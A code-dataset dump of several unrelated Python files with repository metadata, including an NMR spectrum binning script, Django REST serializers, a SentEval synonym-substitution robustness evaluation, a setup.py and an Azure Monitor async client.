import matplotlib.pyplot as plt
import os
samples = len(os.listdir('urine'))
this = sys.modules[__name__]
def find_nearest(array, value):
array = np.asarray(array)
idx = (np.abs(array - value)).argmin()
return idx
i = 1
df = pd.DataFrame([])
yarr=[]
xarr=[]
while i < samples+1:
    name="urine/Calvin_Gab_ATU"+str(i)+"/1/pdata/1"
    dic, data= ng.bruker.read_pdata(name)
    sf=float(dic["procs"]["SF"])
    sfo1=float(dic["acqus"]["SFO1"])
    o1=float(dic["acqus"]["O1"])
    hzppt=float(dic["acqus"]["SW_h"])/len(data)
    swh=float(dic["acqus"]["SW_h"])
    sr=o1+(sf-sfo1)*1000000.
    pts=int(sr//hzppt)
    data = ng.proc_base.rev(data)
    si=len(data)
    xs=[]
    for j in range(0-pts,si-pts):
        hz=float(((o1-swh/2)+(hzppt*(j)))/sf)
        xs+=[hz]
    xs = np.asarray(xs)
    xmin=-.25
    xmax=1.4
    xbin=(xmax-xmin)/5
    k=1
    f=0
    a={}
    for j in np.arange(xmin,xmax, xbin):
        f=j+xbin
        fpos=find_nearest(xs, f)
        jpos=find_nearest(xs, j)
        peak = data[jpos:fpos]
        a[k]=peak.sum()
        k+=1
    b=pd.Series(a, name=i)
    df = df.append(b)
    yarr.append(data)
    xarr.append(xs)
    i += 1
df
| true
| true
|
1c424ae2b5a7e4f8cc44cdee482b49da3c0d31b5
| 1,622
|
py
|
Python
|
backend/course/api/v1/serializers.py
|
crowdbotics-apps/suraj-30223
|
1830a1c3dcd5ca56e817ec2dd110778c5ab1feb4
|
[
"FTL",
"AML",
"RSA-MD"
] | null | null | null |
backend/course/api/v1/serializers.py
|
crowdbotics-apps/suraj-30223
|
1830a1c3dcd5ca56e817ec2dd110778c5ab1feb4
|
[
"FTL",
"AML",
"RSA-MD"
] | 8
|
2021-09-05T22:19:20.000Z
|
2021-10-06T13:40:50.000Z
|
backend/course/api/v1/serializers.py
|
crowdbotics-apps/suraj-30223
|
1830a1c3dcd5ca56e817ec2dd110778c5ab1feb4
|
[
"FTL",
"AML",
"RSA-MD"
] | null | null | null |
from rest_framework import serializers
from course.models import (
PaymentMethod,
Recording,
Category,
Lesson,
Enrollment,
SubscriptionType,
Module,
Group,
Course,
Subscription,
Event,
)
class ModuleSerializer(serializers.ModelSerializer):
class Meta:
model = Module
fields = "__all__"
class LessonSerializer(serializers.ModelSerializer):
class Meta:
model = Lesson
fields = "__all__"
class PaymentMethodSerializer(serializers.ModelSerializer):
class Meta:
model = PaymentMethod
fields = "__all__"
class EnrollmentSerializer(serializers.ModelSerializer):
class Meta:
model = Enrollment
fields = "__all__"
class SubscriptionSerializer(serializers.ModelSerializer):
class Meta:
model = Subscription
fields = "__all__"
class SubscriptionTypeSerializer(serializers.ModelSerializer):
class Meta:
model = SubscriptionType
fields = "__all__"
class GroupSerializer(serializers.ModelSerializer):
class Meta:
model = Group
fields = "__all__"
class CourseSerializer(serializers.ModelSerializer):
class Meta:
model = Course
fields = "__all__"
class RecordingSerializer(serializers.ModelSerializer):
class Meta:
model = Recording
fields = "__all__"
class EventSerializer(serializers.ModelSerializer):
class Meta:
model = Event
fields = "__all__"
class CategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = "__all__"
| 20.024691
| 62
| 0.673859
|
from rest_framework import serializers
from course.models import (
PaymentMethod,
Recording,
Category,
Lesson,
Enrollment,
SubscriptionType,
Module,
Group,
Course,
Subscription,
Event,
)
class ModuleSerializer(serializers.ModelSerializer):
class Meta:
model = Module
fields = "__all__"
class LessonSerializer(serializers.ModelSerializer):
class Meta:
model = Lesson
fields = "__all__"
class PaymentMethodSerializer(serializers.ModelSerializer):
class Meta:
model = PaymentMethod
fields = "__all__"
class EnrollmentSerializer(serializers.ModelSerializer):
class Meta:
model = Enrollment
fields = "__all__"
class SubscriptionSerializer(serializers.ModelSerializer):
class Meta:
model = Subscription
fields = "__all__"
class SubscriptionTypeSerializer(serializers.ModelSerializer):
class Meta:
model = SubscriptionType
fields = "__all__"
class GroupSerializer(serializers.ModelSerializer):
class Meta:
model = Group
fields = "__all__"
class CourseSerializer(serializers.ModelSerializer):
class Meta:
model = Course
fields = "__all__"
class RecordingSerializer(serializers.ModelSerializer):
class Meta:
model = Recording
fields = "__all__"
class EventSerializer(serializers.ModelSerializer):
class Meta:
model = Event
fields = "__all__"
class CategorySerializer(serializers.ModelSerializer):
class Meta:
model = Category
fields = "__all__"
| true
| true
|
1c424b51f87ee9c16ce3ceab130d2364d060ec6d
| 80
|
py
|
Python
|
main/passport/__init__.py
|
anvarliorxan/task1
|
39c5a42c174adce16b0ddbbde4692ebd510d5cb2
|
[
"MIT"
] | null | null | null |
main/passport/__init__.py
|
anvarliorxan/task1
|
39c5a42c174adce16b0ddbbde4692ebd510d5cb2
|
[
"MIT"
] | null | null | null |
main/passport/__init__.py
|
anvarliorxan/task1
|
39c5a42c174adce16b0ddbbde4692ebd510d5cb2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
default_app_config = 'main.passport.apps.PassportConfig'
| 40
| 56
| 0.725
|
default_app_config = 'main.passport.apps.PassportConfig'
| true
| true
|
1c424bcf1e1344e55e8c40bcca6a160fb609ccc7
| 7,626
|
py
|
Python
|
examples/gensen_util.py
|
goel96vibhor/AdvSentEval
|
c23684c5f9da905517071361fdb40acf194cd608
|
[
"BSD-3-Clause"
] | 2
|
2018-12-19T22:06:22.000Z
|
2019-01-29T16:59:31.000Z
|
examples/gensen_util.py
|
goel96vibhor/AdvSentEval
|
c23684c5f9da905517071361fdb40acf194cd608
|
[
"BSD-3-Clause"
] | null | null | null |
examples/gensen_util.py
|
goel96vibhor/AdvSentEval
|
c23684c5f9da905517071361fdb40acf194cd608
|
[
"BSD-3-Clause"
] | 2
|
2019-02-10T22:40:43.000Z
|
2019-04-03T06:16:33.000Z
|
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
"""
Clone GenSen repo here: https://github.com/Maluuba/gensen.git
And follow instructions for loading the model used in batcher
"""
from __future__ import absolute_import, division, unicode_literals
import sys
import logging
# import GenSen package
from gensen import GenSen, GenSenSingle
import gensen
import numpy as np
# Set PATHs
PATH_TO_SENTEVAL = '../'
PATH_TO_DATA = '../data'
PATH_TO_VEC = 'fasttext/crawl-300d-2M.vec'
# import SentEval
sys.path.insert(0, PATH_TO_SENTEVAL)
import senteval
sys.path.insert(1,PATH_TO_SENTEVAL)
from AdversarialModels import WordNetSynonym
import io
def get_sentence(sentence):
sent = ""
for word in sentence:
sent+=word+" "
return sent
def create_dictionary(sentences, threshold=0):
words = {}
for s in sentences:
for word in s:
words[word] = words.get(word, 0) + 1
if threshold > 0:
newwords = {}
for word in words:
if words[word] >= threshold:
newwords[word] = words[word]
words = newwords
words['<s>'] = 1e9 + 4
words['</s>'] = 1e9 + 3
words['<p>'] = 1e9 + 2
sorted_words = sorted(words.items(), key=lambda x: -x[1]) # inverse sort
id2word = []
word2id = {}
for i, (w, _) in enumerate(sorted_words):
id2word.append(w)
word2id[w] = i
return id2word, word2id
# SentEval prepare and batcher
def prepare(params, samples):
_, params.word2id = create_dictionary(samples)
params.word_vec = get_wordvec(PATH_TO_VEC, params.word2id)
params.wvec_dim = 300
return
def get_wordvec(path_to_vec, word2id):
word_vec = {}
with io.open(path_to_vec, 'r', encoding='utf-8') as f:
# if word2vec or fasttext file : skip first line "next(f)"
for line in f:
word, vec = line.split(' ', 1)
if word in word2id:
word_vec[word] = np.fromstring(vec, sep=' ')
logging.info('Found {0} words with word vectors, out of \
{1} words'.format(len(word_vec), len(word2id)))
return word_vec
def batcher(params, batch):
batch = [' '.join(sent) if sent != [] else '.' for sent in batch]
_, reps_h_t = gensen_encoder.get_representation(
batch, pool='last', return_numpy=True, tokenize=True
)
embeddings = reps_h_t
return embeddings
def prepare_adversarial_samples(params, sentences, y_labels):
new_sentences = []
new_labels = []
for sent, label in zip(sentences, y_labels):
sent_adversaries = []
sent_adv_labels = []
new_sent = list(sent)
sent_adversaries.append(new_sent)
sent_adv_labels.append(label)
new_sent = list(sent)
sent_adversaries.append(new_sent)
sent_adv_labels.append(label)
# if sent == sentences[43]:
# print("orig sent vec", get_sentence(sent), " ,label:", label)
# print("mod sent vec", get_sentence(new_sent))
for word, word_pos in zip(sent, range(len(sent))):
# print "new word ", word, "-" *80
if word in params.word_vec:
# print word, "-" * 30
# print params.word_vec[word][:20]
new_sent = list(sent)
# print "new sent vec ", "-" * 30
# print new_sentvec[:20]
word_syns = WordNetSynonym.get_word_synonym(word)
# print word_syns
for syn in word_syns:
if syn in params.word_vec:
if syn == word:
continue
# print syn, "-"*30
# print params.word_vec[syn][:20]
new_sent = list(sent)
new_sent[word_pos] = syn
sent_adversaries.append(new_sent)
sent_adv_labels.append(label)
# if sent == sentences[43]:
# print("mod sent vec", get_sentence(new_sent))
# print "mod sent vec", "-" * 30
# print modified_vecs[len(modified_vecs)-1][:20], "\n"
new_sentences.append(sent_adversaries)
new_labels.append(sent_adv_labels)
return new_sentences, new_labels
def adversarialFunc(params, batch_sentences, batch_labels, embeddings = None):
# sentvec = np.multiply(sentvec, params.wvec_dim)
adv_batch_sentences, adv_labels = prepare_adversarial_samples(params, batch_sentences, batch_labels)
print("adv samples size %d",len(adv_batch_sentences))
total_count = sum(len(x) for x in adv_batch_sentences)
print("sum of sentences called %d, batch_size %d" %(total_count, params.batch_size))
adv_embeddings = []
for sent_adversaries, i in zip(adv_batch_sentences, range(len(adv_batch_sentences))):
sentences = [' '.join(sent) if sent != [] else '.' for sent in sent_adversaries]
_, reps_h_t = gensen_encoder.get_representation(
sentences, pool='last', return_numpy=True, tokenize=True
)
sent_adv_embeddings = reps_h_t
# sent_adv_embeddings = params.infersent.encode_without_shuffle(sentences, bsize=params.batch_size, tokenize=False)
adv_embeddings.append(sent_adv_embeddings)
if i%10 == 0:
print("%d sentences done"%(i))
# print("Adv embeddings shape: %s, adv_labels shape", len(sent_adv_embeddings), dim(adv_labels[i]))
print("Adv embeddings shape: %s, adv_labels shape %s" %(len(adv_embeddings), len(adv_labels)))
for i in range(0,len(adv_embeddings),10):
print("Adv embeddings shape: %s, adv_labels shape", len(adv_embeddings[i]), len(adv_labels[i]))
return adv_embeddings, adv_labels, adv_batch_sentences
# Load GenSen model
gensen_1 = GenSenSingle(
model_folder='../data/models',
filename_prefix='nli_large_bothskip',
pretrained_emb='fasttext/glove.840B.300d.h5'
)
gensen_2 = GenSenSingle(
model_folder='../data/models',
filename_prefix='nli_large_bothskip_parse',
pretrained_emb='fasttext/glove.840B.300d.h5'
)
gensen_encoder = GenSen(gensen_1, gensen_2)
# reps_h, reps_h_t = gensen_encoder.get_representation(
# sentences, pool='last', return_numpy=True, tokenize=True
# )
# Set params for SentEval
params_senteval = {'task_path': PATH_TO_DATA, 'usepytorch': True, 'kfold': 5, 'model_name': 'gensen','batch_size': 128}
params_senteval['classifier'] = {'nhid': 0, 'optim': 'rmsprop', 'batch_size': 128,
'tenacity': 3, 'epoch_size': 2, 'cudaEfficient' : True}
params_senteval['gensen'] = gensen_encoder
# Set up logger
logging.basicConfig(format='%(asctime)s : %(message)s', level=logging.DEBUG)
if __name__ == "__main__":
se = senteval.engine.SE(params_senteval, batcher, prepare, adversarialFunc=adversarialFunc)
# transfer_tasks = ['STS12', 'STS13', 'STS14', 'STS15', 'STS16',
# 'MR', 'CR', 'MPQA', 'SUBJ', 'SST2', 'SST5', 'TREC', 'MRPC',
# 'SICKEntailment', 'SICKRelatedness', 'STSBenchmark',
# 'Length', 'WordContent', 'Depth', 'TopConstituents',
# 'BigramShift', 'Tense', 'SubjNumber', 'ObjNumber',
# 'OddManOut', 'CoordinationInversion']
transfer_tasks = ['STSBenchmark']
results = se.eval(transfer_tasks)
# print(results)
| 32.589744
| 123
| 0.621558
|
from __future__ import absolute_import, division, unicode_literals
import sys
import logging
from gensen import GenSen, GenSenSingle
import gensen
import numpy as np
PATH_TO_SENTEVAL = '../'
PATH_TO_DATA = '../data'
PATH_TO_VEC = 'fasttext/crawl-300d-2M.vec'
sys.path.insert(0, PATH_TO_SENTEVAL)
import senteval
sys.path.insert(1,PATH_TO_SENTEVAL)
from AdversarialModels import WordNetSynonym
import io
def get_sentence(sentence):
sent = ""
for word in sentence:
sent+=word+" "
return sent
def create_dictionary(sentences, threshold=0):
words = {}
for s in sentences:
for word in s:
words[word] = words.get(word, 0) + 1
if threshold > 0:
newwords = {}
for word in words:
if words[word] >= threshold:
newwords[word] = words[word]
words = newwords
words['<s>'] = 1e9 + 4
words['</s>'] = 1e9 + 3
words['<p>'] = 1e9 + 2
sorted_words = sorted(words.items(), key=lambda x: -x[1])
id2word = []
word2id = {}
for i, (w, _) in enumerate(sorted_words):
id2word.append(w)
word2id[w] = i
return id2word, word2id
def prepare(params, samples):
_, params.word2id = create_dictionary(samples)
params.word_vec = get_wordvec(PATH_TO_VEC, params.word2id)
params.wvec_dim = 300
return
def get_wordvec(path_to_vec, word2id):
word_vec = {}
with io.open(path_to_vec, 'r', encoding='utf-8') as f:
for line in f:
word, vec = line.split(' ', 1)
if word in word2id:
word_vec[word] = np.fromstring(vec, sep=' ')
logging.info('Found {0} words with word vectors, out of \
{1} words'.format(len(word_vec), len(word2id)))
return word_vec
def batcher(params, batch):
batch = [' '.join(sent) if sent != [] else '.' for sent in batch]
_, reps_h_t = gensen_encoder.get_representation(
batch, pool='last', return_numpy=True, tokenize=True
)
embeddings = reps_h_t
return embeddings
def prepare_adversarial_samples(params, sentences, y_labels):
new_sentences = []
new_labels = []
for sent, label in zip(sentences, y_labels):
sent_adversaries = []
sent_adv_labels = []
new_sent = list(sent)
sent_adversaries.append(new_sent)
sent_adv_labels.append(label)
new_sent = list(sent)
sent_adversaries.append(new_sent)
sent_adv_labels.append(label)
for word, word_pos in zip(sent, range(len(sent))):
if word in params.word_vec:
new_sent = list(sent)
word_syns = WordNetSynonym.get_word_synonym(word)
for syn in word_syns:
if syn in params.word_vec:
if syn == word:
continue
new_sent = list(sent)
new_sent[word_pos] = syn
sent_adversaries.append(new_sent)
sent_adv_labels.append(label)
new_sentences.append(sent_adversaries)
new_labels.append(sent_adv_labels)
return new_sentences, new_labels
def adversarialFunc(params, batch_sentences, batch_labels, embeddings = None):
adv_batch_sentences, adv_labels = prepare_adversarial_samples(params, batch_sentences, batch_labels)
print("adv samples size %d",len(adv_batch_sentences))
total_count = sum(len(x) for x in adv_batch_sentences)
print("sum of sentences called %d, batch_size %d" %(total_count, params.batch_size))
adv_embeddings = []
for sent_adversaries, i in zip(adv_batch_sentences, range(len(adv_batch_sentences))):
sentences = [' '.join(sent) if sent != [] else '.' for sent in sent_adversaries]
_, reps_h_t = gensen_encoder.get_representation(
sentences, pool='last', return_numpy=True, tokenize=True
)
sent_adv_embeddings = reps_h_t
adv_embeddings.append(sent_adv_embeddings)
if i%10 == 0:
print("%d sentences done"%(i))
print("Adv embeddings shape: %s, adv_labels shape %s" %(len(adv_embeddings), len(adv_labels)))
for i in range(0,len(adv_embeddings),10):
print("Adv embeddings shape: %s, adv_labels shape", len(adv_embeddings[i]), len(adv_labels[i]))
return adv_embeddings, adv_labels, adv_batch_sentences
gensen_1 = GenSenSingle(
model_folder='../data/models',
filename_prefix='nli_large_bothskip',
pretrained_emb='fasttext/glove.840B.300d.h5'
)
gensen_2 = GenSenSingle(
model_folder='../data/models',
filename_prefix='nli_large_bothskip_parse',
pretrained_emb='fasttext/glove.840B.300d.h5'
)
gensen_encoder = GenSen(gensen_1, gensen_2)
params_senteval = {'task_path': PATH_TO_DATA, 'usepytorch': True, 'kfold': 5, 'model_name': 'gensen','batch_size': 128}
params_senteval['classifier'] = {'nhid': 0, 'optim': 'rmsprop', 'batch_size': 128,
'tenacity': 3, 'epoch_size': 2, 'cudaEfficient' : True}
params_senteval['gensen'] = gensen_encoder
logging.basicConfig(format='%(asctime)s : %(message)s', level=logging.DEBUG)
if __name__ == "__main__":
se = senteval.engine.SE(params_senteval, batcher, prepare, adversarialFunc=adversarialFunc)
transfer_tasks = ['STSBenchmark']
results = se.eval(transfer_tasks)
| true
| true
|
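The prepare_adversarial_samples routine above builds adversarial variants of each sentence by swapping individual words for WordNet synonyms via the repository's WordNetSynonym helper, which is not shown in this row. Below is a standalone sketch of the same idea using NLTK's WordNet interface directly; the function names are assumptions for illustration, not the repository's API.

# Illustrative single-word synonym substitution with NLTK WordNet
# (requires: pip install nltk; then nltk.download('wordnet')).
from nltk.corpus import wordnet

def get_word_synonyms(word):
    # Collect unique lemma names across all synsets of the word.
    synonyms = set()
    for synset in wordnet.synsets(word):
        for lemma in synset.lemmas():
            synonyms.add(lemma.name().replace('_', ' '))
    synonyms.discard(word)
    return sorted(synonyms)

def substitute_word(sentence_tokens, position, synonym):
    # Return a copy of the token list with one token replaced,
    # mirroring the new_sent[word_pos] = syn step in the code above.
    new_tokens = list(sentence_tokens)
    new_tokens[position] = synonym
    return new_tokens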
1c424c5b0f0ac998a7628cfec79e85809197b4fa
| 439
|
py
|
Python
|
setup.py
|
Kailiangdong/hgail
|
a668c4dda09d4e7f85b4640f42ff57b6764d24cc
|
[
"MIT"
] | 24
|
2018-03-16T22:29:16.000Z
|
2021-11-12T07:33:28.000Z
|
setup.py
|
Kailiangdong/hgail
|
a668c4dda09d4e7f85b4640f42ff57b6764d24cc
|
[
"MIT"
] | 2
|
2018-06-29T06:37:46.000Z
|
2018-08-06T01:02:13.000Z
|
setup.py
|
Kailiangdong/hgail
|
a668c4dda09d4e7f85b4640f42ff57b6764d24cc
|
[
"MIT"
] | 15
|
2018-07-30T16:46:07.000Z
|
2022-03-13T06:24:11.000Z
|
from setuptools import setup
setup(name='hgail',
version='0.1',
description='Generative Adversarial Imitation Learning',
author='Blake Wulfe',
author_email='wulfebw@stanford.edu',
license='MIT',
packages=['hgail'],
zip_safe=False,
install_requires=[
'numpy',
'rllab',
'tensorflow',
'gym',
'h5py',
'cached_property',
'joblib',
])
| 23.105263
| 62
| 0.553531
|
from setuptools import setup
setup(name='hgail',
version='0.1',
description='Generative Adversarial Imitation Learning',
author='Blake Wulfe',
author_email='wulfebw@stanford.edu',
license='MIT',
packages=['hgail'],
zip_safe=False,
install_requires=[
'numpy',
'rllab',
'tensorflow',
'gym',
'h5py',
'cached_property',
'joblib',
])
| true
| true
|
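After installing the package defined by the setup.py above (for example with pip from the repository root), the standard-library importlib.metadata can confirm the distribution; the name 'hgail' and version '0.1' come from the setup() call, everything else here is illustrative.

# Quick post-install check (Python 3.8+); assumes a prior "pip install ." or "pip install -e .".
from importlib.metadata import version, requires

print(version('hgail'))    # expected '0.1' per the setup() call above
print(requires('hgail'))   # declared install_requires: numpy, rllab, tensorflow, gym, h5py, ...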
1c424ce98abcf0f737bebde30fff739a28e3c53b
| 2,806
|
py
|
Python
|
sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2016_09_01/aio/_monitor_management_client.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 3
|
2020-06-23T02:25:27.000Z
|
2021-09-07T18:48:11.000Z
|
sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2016_09_01/aio/_monitor_management_client.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 510
|
2019-07-17T16:11:19.000Z
|
2021-08-02T08:38:32.000Z
|
sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2016_09_01/aio/_monitor_management_client.py
|
rsdoherty/azure-sdk-for-python
|
6bba5326677468e6660845a703686327178bb7b1
|
[
"MIT"
] | 5
|
2019-09-04T12:51:37.000Z
|
2020-09-16T07:28:40.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration import MonitorManagementClientConfiguration
from .operations import MetricsOperations
from .operations import ServiceDiagnosticSettingsOperations
from .. import models
class MonitorManagementClient(object):
"""Monitor Management Client.
:ivar metrics: MetricsOperations operations
:vartype metrics: $(python-base-namespace).v2016_09_01.aio.operations.MetricsOperations
:ivar service_diagnostic_settings: ServiceDiagnosticSettingsOperations operations
:vartype service_diagnostic_settings: $(python-base-namespace).v2016_09_01.aio.operations.ServiceDiagnosticSettingsOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param str base_url: Service URL
"""
def __init__(
self,
credential: "AsyncTokenCredential",
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = MonitorManagementClientConfiguration(credential, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._serialize.client_side_validation = False
self._deserialize = Deserializer(client_models)
self.metrics = MetricsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.service_diagnostic_settings = ServiceDiagnosticSettingsOperations(
self._client, self._config, self._serialize, self._deserialize)
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "MonitorManagementClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
| 42.515152
| 129
| 0.705987
|
from typing import Any, Optional, TYPE_CHECKING
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration import MonitorManagementClientConfiguration
from .operations import MetricsOperations
from .operations import ServiceDiagnosticSettingsOperations
from .. import models
class MonitorManagementClient(object):
def __init__(
self,
credential: "AsyncTokenCredential",
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = MonitorManagementClientConfiguration(credential, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._serialize.client_side_validation = False
self._deserialize = Deserializer(client_models)
self.metrics = MetricsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.service_diagnostic_settings = ServiceDiagnosticSettingsOperations(
self._client, self._config, self._serialize, self._deserialize)
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "MonitorManagementClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
| true
| true
|
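A minimal usage sketch for the async MonitorManagementClient above, relying on the __aenter__/__aexit__ support defined in the class; the DefaultAzureCredential import assumes the separate azure-identity package, which this file does not itself require, and the import path for the client simply mirrors the file location shown above.

# Illustrative construction of the async client (assumes azure-identity is installed).
import asyncio
from azure.identity.aio import DefaultAzureCredential
from azure.mgmt.monitor.v2016_09_01.aio import MonitorManagementClient

async def main():
    credential = DefaultAzureCredential()
    # The client supports async context management, as defined in the class above.
    async with MonitorManagementClient(credential) as client:
        # client.metrics and client.service_diagnostic_settings are available here.
        pass
    await credential.close()

asyncio.run(main())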